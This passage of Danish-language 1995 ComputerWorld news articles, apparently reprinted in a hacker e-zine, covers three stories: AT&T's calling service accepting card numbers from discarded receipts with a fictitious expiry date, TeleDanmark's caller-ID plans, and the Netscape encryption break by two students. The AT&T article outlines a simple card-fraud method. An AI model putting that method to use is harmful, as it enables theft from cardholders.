kort. Voice response-systemet hos AT&T oplyser, at man kan indtaste nummeret på sit AT&T calling card eller "any major credit card". Stemmen beder også om kortets udl¢bsdato, men acceptere gerne en fiktiv dato, viser en test af mulig- hederne. At bede om udl¢bsdatoen, som normalt ikke står på kvitteringen, er tilsyneladende ment som en sikkerhedsforanstaltning. Man kan misbruge både Eurocard og Visa Dankort. Ved en test lykkedes det med det samme at komme igennem ved hjælp af kortnumre fra flere Eurocard kvitteringer. Per Ladegaard, administrerende direkt¢r for Pengeinstitutternes Betalinge Service, fortæller, at hans folk også kom igennem på Visa Dankort, da de efter ComputerWorlds henvendelse afpr¢vede mulighederne. Hold ¢je med opkrævning. Fordi pinkoden på betalingskortet ikke indgår i misbruget, kommer kortindehaveren ikke til at hænge på en ¢re af regningen. Det står klart i betalingskortloven. - Men det kræver selvf¢lgeligt, at man op- dager, at ens betalingskortnummer er blevet misbrugt af andre til for eksempel at ringe verden rundt, siger kontorchef i Forbrugerstyrelsen, Frank Bjerg Mor- tensen. - Man skal altid kontrollere opkrævningerne fra kortselskaberne. De er en del af sikkerhedssystemet, siger Per Ladegaard, PBS. Det er PBS, der i Dan- mark administrerer Eurocard og Visa Dankort. Selv om Forbrugerstyrelsen og PBS er enige om, at forbrugeren ikke hæf- ter for misbrug, er de ikke enige om, hvem der så hænger på regningen. - Det er kortudstederen, der hæfter. Det er denne ansvar, at kortnumre ikke kan mis- bruges. For kortnumre er ikke hemmelige, og det må ikke komme brugeren til skade at smide en kvittering i papirkurven, siger Frank Bjerg Mortensen. - Problemet ligger ikke hos os, men hos AT&T. Det er dem, der er service- udbyder. Deres kontrolsystem er tilsyneladende ikke godt nok, når det ikke af- viser en falsk udl¢bsdato, siger Per Ladegaard. Han siger, at PBS vil tage sagen op med AT&T via de internationale kanaler, men at det godt kan tage nogen tid, f¢r problemet bliver l¢st. Det er ikke lykkedes at få en kommenter fra AT&T. Problemet med misbrug af kreditkort er dog ikke så stort, som det bliver gjort til, mener administrerende direkt¢r Per Ladegaard, PBS. - Vores opg¢relser viser, at tendensen til tab på grund af misbrug både af Dankort og kreditkort er faldende, siger Per Ladegaard, som understreger, at PBS ikke slækker på sikkerheden af den grund. -------------- AT&T havde samme service i slutningen af 1980'erne, og det voldte den så store problemer, at de måtte lukke den service (til en vis grad), og så genåbner man den service igen, UDEN at forbedre sin sikkerhed! Hvor smart er man så??? Se hackerens telefonnummer Af Pia Lykke Andersen ComputerWorld nr. 30 - 8. September 1995 - Clive Sharp I l¢bet af et halvt år vil TeleDanmark tilbyde de f¢rste kunder mulig- heden for at se på telefonen, hvilket nummer der ringes fra. Mange edb-afdelinger har pr¢vet det: En hacker er i nattens l¢b trængt ind i systemerne og har hentet informationer i virksomheden eller brugt tele- fonsystemet til at ringe videre ud i verden. Til stor irritation for de fleste der har haft ubudte gæster via telefonnettet, er det ikke muligt at få oplyst, hvem der har ringet til virksomheden. L¢sningen hedder A-nummeroverf¢rsel, og det kan i princippet godt lade sig g¢re. Flere at vore nabolande har inf¢rt det, men det er ikke tilladt i Danmark. Men der er håb forude for edb-afdeli- nger og andre der bliver udsat for ubehagelige opringninger. I nær fremtid bliver de en bekymring mindre. En arbejdsgruppe i TeleDanmark unders¢ger i ¢je- blikket, hvordan, og i hvilken takt, A-nummeroverf¢rsel kan indf¢res herhjemme. Centraler ændres. I l¢bet af det næste halve år, begynder TeleDanmark at tilbyde A- nummeroverf¢rsel i en række testområder i Danmark. Den nye service bliver sand- synligt lansdækkende i l¢bet af et par år. At A-nummeroverf¢rsel ikke er til- ladt i Danmark skyldes hensynet til de abonnenter, som ¢nsker hemmeligt nummer. Men ved fremtidens A-nummeroverf¢rsel vil de hemmelige telefonnumre kunne for- blive hemmelige. Enten ved at software på den digitale telefoncentral registr- erer, at det hemmeligt nummer ikke skal f¢res videre til modtageren af sam- talen, eller ved, at den, der ringer op programmere sin telefon til ikke at op- lyse, hvem man er. Tilsvarende kan modtageren af samtaler programmere sin tele- fon til at afvise anonyme opkald. De digitale telefoncentraler er ikke program- merede til A-nummeroverf¢rsel, men deres software kan konfigureres til den nye service. Sandsynligvis bliver omkring 300.000 abonnenter, som h¢rer til på en digital AXE-telefoncentral i S¢nderjylland og på Fyn, de f¢rste, der kan tage A-nummeroverf¢rsel i brug. Endnu har ETSI (det europæiske telestandardiserings- organ) ikke udsendt en international standard for overf¢rsel af A-numre i tele- fonnettet, og den er heller ikke lige på trapperne. Derfor vælger operat¢rerne selv, hvilken metode de finder bedst til den nye service. Den nye service betyder også, at der vil komme nye telefoner på markedet. Når A-nummerover- f¢rsel bliver aktuel i Danmark, vil TeleDanmark samtidigt markedsf¢re et disp- lay, som kan kobles til telefonen. Det kan vise, hvor der ringes fra. Prisen bliver sandsynligvis er par hundrede kroner. ISDN til ISDN. Enhver regel bekræftes som bekendt af undtagelsen. Også den om det forbudte A-nummer. Danske abonnenter med ISDN-forbindelser kan nemmeligt aller- ede se hinandens telefonnumre på telefonens display, hvis begge parter ¢nsker det. Sikkerhedshul i Netscape Af Pia Lykke Andersen ComputerWorld nr. 30 - 8. September 1995 To studerende har gættet sig frem til krypteringskoden på Netscape, det mest benyttede software til WWW på Internet. Sent s¢ndag aften sendte to californiske studerende, Ian goldberg og David Wagner, en besked ud på Internet, som har vakt en del opsigt: På blot to dage var det lykkedes dem at finde et svagt hul i Netscape og skrive software, som på mindre end et minut g¢r det muligt at bryde krypteringskoden til Net- scape. Sikkerheden på Netscape skabes ved brug af såkaldt symmetrisk n¢gle- kryptografi. N¢glen består af en matematisk formel så lang, at den er umulig for hackere at bryde. Men det tilfældige tal, som skaber den krypterede n¢gle, var nemt for de to studerende at gætte sig frem til. - Netscapes software er ikke så godt, som folk troede, hvilket sandsynligvis er værre, end ingen sikkerhed, da folk får falsk tryghed, når de sender betalingsdetaljer over Int- ernet, sagde Jan Goldberg tidligere på ugen til Wall Street Journal. If¢lge samme avis lykkedes samme man¢vre allerede for en måned siden for en fransk studerende. Netscape Navigator er det mest brugte redskab til at finde rundt på den grafiske del af Internet, World Wide Web, hvor man blandt andet kan gå på indk¢b i virtuelle forretninger, og hvor man må opgive sit kreditkortnummer for at få varen leveret. hidtil er det blevet betragtet som ganske sikkert, at opgive kreditkortnumre og sende andre f¢lsomme oplysninger over Internet [!!!]. Hullet kan lappes. Netscape benyttes i dag af flere end otte milioner mennesker. At den nyopdagede svaghed i Netscape Navigator faktisk er en realitet, bekræftes af Netscape-selskabet. I en meddelelse på Internet forklarer firmaet selv pro- blemet. - Netscape vil hurtigst muligt sende opdateret software på Internet, hvorfra brugerne kan downloade det. En opdateret version af Netscape Navigator 1.1 til Mac OS, Unix og af Netscape Navigator 1.2 til Windows 3.1 og Windows 95 vil kunne downloades af eksisterende brugere af Internet i næste uge. Desuden vil version 2.0 af Netscape Navigator, som kommer i beta-versioner i næste uge, også indeholde dette supplement såvel som et antal yderligere sikkerheds- foranstaltninger, lyder det i budskabet fra Netscape. Virksomheden Netscape, som blev stiftet sidste år, hentede i april måned 17 millioner dollars til huse ved at sælge 11 procent af aktierne i sel- skabet. Bland andet k¢bte ComputerWorlds moderselskab, IDG, en andel på to pro- cent. I august måned gik Netscape på Nasdaq-b¢rsen med salg af 3,5 millioner aktier til priser mellem 12 og 14 dollars, og firmaet betegnes som et af de mest interessante foretagender i Internet-software industrien. ENDEX